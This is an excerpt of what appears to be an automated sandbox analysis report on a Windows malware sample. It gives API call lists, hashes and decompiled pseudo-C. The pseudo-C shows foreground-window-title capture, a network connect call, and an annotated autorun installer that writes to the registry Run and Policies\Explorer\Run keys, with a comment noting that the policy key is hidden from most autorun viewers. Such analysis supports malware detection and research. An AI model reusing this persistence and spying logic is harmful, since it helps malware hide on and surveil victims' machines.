                                  • Opcode Fuzzy Hash: 219c59aa8cfc69ea39da170a382ad6fcb882ddad4a02d2a278ec9a39d153be36
                                  • Instruction Fuzzy Hash: 9311D3B680011DFBCF01EBE1EC49DEF7B7CBA54745B044026F912D2061EB789699CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00405853
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405868
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405874
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405898
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004058AE
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058B7
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004058CC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058D6
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405902
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405922
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040590C
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405943
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040594D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405963
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405974
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040597F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,0041B310), ref: 00405994
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFileconnect
                                  • String ID:
                                  • API String ID: 257471410-0
                                  • Opcode ID: 83dcd43653f5a46f8ce17e076b78250aa34a7d21deb8e598d0ab0f6f50af779d
                                  • Instruction ID: a7298ed754ce3842782531f55b1250d517e56450e3269786ed83483861d592cb
                                  • Opcode Fuzzy Hash: 83dcd43653f5a46f8ce17e076b78250aa34a7d21deb8e598d0ab0f6f50af779d
                                  • Instruction Fuzzy Hash: 034152B2D00508ABCB05FBA1ED5A9EE7738DF54304B10407AE912B71D2EB795F48CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 30%
                                  			E00412F73(char _a4, void* _a20) {
                                  				char _v5;
                                  				void* _v24;
                                  				char _v40;
                                  				int _t26;
                                  				int _t29;
                                  				void* _t37;
                                  				unsigned int _t66;
                                  				signed int _t67;
                                  				int _t70;
                                  				signed short _t73;
                                  				struct HWND__* _t81;
                                  				void* _t83;
                                  
                                  				_t81 = GetForegroundWindow();
                                  				_t26 = GetWindowTextLengthA(_t81);
                                  				_t89 = _t26;
                                  				if(_t26 <= 0) {
                                  					L6:
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return 0;
                                  				}
                                  				_t28 = _t26 + 1;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z( &_v5);
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t29 = GetWindowTextA(_t81, _t26 + 1, _t26 + 1);
                                  				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                  				__imp__?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                  				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                  				E00413A29(_t29, _t29, _t29, __imp__tolower);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(_t89,  &_v40,  &_a4, 0x415b80,  &_v5, _t28, 0);
                                  				_t73 = 0;
                                  				if(E00401838( &_v40) <= 0) {
                                  					L5:
                                  					E004017DD( &_v40);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					goto L6;
                                  				}
                                  				_t82 = 0;
                                  				while(1) {
                                  					_t37 = E0040180C( &_v40, 0, _t82);
                                  					__imp__?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z(_t37, 0);
                                  					if(_t37 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                  						break;
                                  					}
                                  					_t73 = _t73 + 1;
                                  					_t82 = _t73 & 0x0000ffff;
                                  					if((_t73 & 0x0000ffff) < E00401838( &_v40)) {
                                  						continue;
                                  					}
                                  					goto L5;
                                  				}
                                  				__eflags = _a20;
                                  				if(_a20 != 0) {
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					asm("repne scasb");
                                  					_t66 =  !( &_v24 | 0xffffffff);
                                  					_t83 = _t37 - _t66;
                                  					_t67 = _t66 >> 2;
                                  					_t70 = memcpy(_a20, _t83, _t67 << 2) & 0x00000003;
                                  					__eflags = _t70;
                                  					memcpy(_t83 + _t67 + _t67, _t83, _t70);
                                  				}
                                  				E004017DD( &_v40);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 1;
                                  			}

                                  0x00412f81
                                  0x00412f84
                                  0x00412f8a
                                  0x00412f8c
                                  0x00413063
                                  0x00413066
                                  0x00000000
                                  0x0041306c
                                  0x00412f95
                                  0x00412f9d
                                  0x00412fa6
                                  0x00412fb0
                                  0x00412fb8
                                  0x00412fc7
                                  0x00412fd1
                                  0x00412fdb
                                  0x00412fe2
                                  0x00412ff2
                                  0x00413001
                                  0x0041300b
                                  0x00413016
                                  0x0041301f
                                  0x00413052
                                  0x00413055
                                  0x0041305d
                                  0x00000000
                                  0x0041305d
                                  0x00413021
                                  0x00413023
                                  0x00413029
                                  0x00413032
                                  0x00413040
                                  0x00000000
                                  0x00000000
                                  0x00413042
                                  0x00413046
                                  0x00413050
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00413050
                                  0x00413072
                                  0x00413076
                                  0x0041307b
                                  0x00413088
                                  0x0041308a
                                  0x00413090
                                  0x00413095
                                  0x0041309c
                                  0x0041309c
                                  0x0041309f
                                  0x0041309f
                                  0x004130a4
                                  0x004130ac
                                  0x004130b5
                                  0x00000000

                                  APIs
                                  • GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                  • GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                  • GetWindowTextA.USER32 ref: 00412FB8
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                  • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0041307B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                                  • String ID:
                                  • API String ID: 3496238640-0
                                  • Opcode ID: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                  • Instruction ID: d45ca6ef39ea3e178db3ab1d94ac08b999b831b850f622e5a8fdf4a981eaba08
                                  • Opcode Fuzzy Hash: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                  • Instruction Fuzzy Hash: 02414E32500509DBCB04EFA1DD5A9EE7BB8EF94342B10416AF803A31A0EF745F45CA69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00405423
                                    • Part of subcall function 00412F73: GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                    • Part of subcall function 00412F73: GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                    • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                    • Part of subcall function 00412F73: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                    • Part of subcall function 00412F73: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                    • Part of subcall function 00412F73: GetWindowTextA.USER32 ref: 00412FB8
                                    • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                    • Part of subcall function 00412F73: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                    • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                    • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                    • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                    • Part of subcall function 00412F73: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                    • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                    • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                  • Sleep.KERNEL32(000001F4), ref: 0040543A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, ]), ref: 00405451
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,00000000), ref: 00405461
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040546E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040547D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405486
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040548F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405498
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004054A7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 004054C5
                                  • Sleep.KERNEL32(00000064), ref: 004054D9
                                   Memory Dump Source
                                   • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@V01@@$D@1@@Window$?begin@?$basic_string@D@2@@0@Hstd@@SleepTextV?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@ForegroundG@2@@std@@G@std@@LengthV01@V10@V10@@V12@
                                  • String ID: [ $ ]
                                  • API String ID: 3011177377-93608704
                                  • Opcode ID: b17b501f1748e2fb1ab18a7c3d85fa49411d46d8c8bbb0057a51120c035d8143
                                  • Instruction ID: b52ba732bfb27aa553af63110ce50c569faff7b52b45cf0ea854f8293cee1314
                                  • Opcode Fuzzy Hash: b17b501f1748e2fb1ab18a7c3d85fa49411d46d8c8bbb0057a51120c035d8143
                                  • Instruction Fuzzy Hash: A9219571A00508BBCB00B7A4DC5ABEF7B78EF44344F004176F602A3192DF7455898B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310), ref: 00403752
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040375B
                                  • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00403773
                                  • _itoa.MSVCRT ref: 0040377A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00403790
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403798
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 004037A7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004037B4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004037C0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037C9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037D2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037DB
                                  • lstrlenA.KERNEL32(00000000), ref: 004037E2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004037F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 00403801
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040380A
                                   Memory Dump Source
                                   • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@DriveTypeV01@_itoalstrlen
                                  • String ID:
                                  • API String ID: 3966177967-0
                                  • Opcode ID: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                  • Instruction ID: 4300f458e19456516dd56dc641f8d1b829b254aea369022c8032761b79b8ee60
                                  • Opcode Fuzzy Hash: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                  • Instruction Fuzzy Hash: B721ADB580060DEBCB05EBE0ED5DDDE777CAF54346B108025F912A3160EB746B49CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                   C-Code - Quality: 68%
                                   			E00407D53(void* __ecx, char _a4, char _a8, char _a12, char _a16) {
                                   				char _v20;
                                   				void* _t13;
                                   				void* _t15;
                                   				char* _t26;
                                   				void* _t27;
                                   				void* _t32;
                                   				void* _t35;

                                   				// Autorun installer: each flag argument enables one registry persistence location.
                                   				// E0040B7B9 (subcall in the APIs list below) performs RegCreateKeyW, RegSetValueExW and
                                   				// RegCloseKey; 0x80000001 is HKEY_CURRENT_USER and 0x80000002 is HKEY_LOCAL_MACHINE.
                                   				// The trailing hex values are the instruction addresses the report shows beside each line.
                                   				_t26 = "\"";  // 0x00407d60
                                   				if(_a4 == 1) {  // 0x00407d6a
                                   					// HKCU\Software\Microsoft\Windows\CurrentVersion\Run
                                   					_t35 = _t27 - 0x10;  // 0x00407d71
                                   					L0041416A();  // 0x00407d7a
                                   					L00414146();  // 0x00407d84
                                   					_t3 =  &_a16; // 0x415a24 (the bytes 24 5A 41 00 are what the Strings list below shows as "$ZA")  // 0x00407d8c
                                   					_t13 = E0040B7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t3, _t35,  &_v20,  &_v20, _t26, 0x41ba28);  // 0x00407d99
                                   					_t27 = _t35 + 0x38;  // 0x00407d9e
                                   					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);  // 0x00407da4
                                   				}  // 0x00407da4
                                   				if(_a8 == 1) {  // 0x00407dae
                                   					// HKLM\Software\Microsoft\Windows\CurrentVersion\Run
                                   					_t32 = _t27 - 0x10;  // 0x00407db5
                                   					L0041416A();  // 0x00407dbe
                                   					L00414146();  // 0x00407dc8
                                   					_t7 =  &_a16; // 0x415a24  // 0x00407dd0
                                   					_t13 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t7, _t32,  &_v20,  &_v20, _t26, 0x41ba28);  // 0x00407ddd
                                   					_t27 = _t32 + 0x38;  // 0x00407de2
                                   					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);  // 0x00407de8
                                   				}  // 0x00407de8
                                   				if(_a12 == 1) {  // 0x00407df2
                                   					// HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (policy autorun, not shown by most autorun viewers' default view)
                                   					L0041416A();  // 0x00407e02
                                   					L00414146();  // 0x00407e0c
                                   					_t15 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x41ba28);  // 0x00407e21
                                   					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);  // 0x00407e2c
                                   					return _t15;  // 0x00000000
                                   				}  // 0x00407e2c
                                   				return _t13;  // 0x00407e36
                                   			}

                                  APIs
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 00407DA4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                    • Part of subcall function 0040B7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                    • Part of subcall function 0040B7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28), ref: 0040B7D5
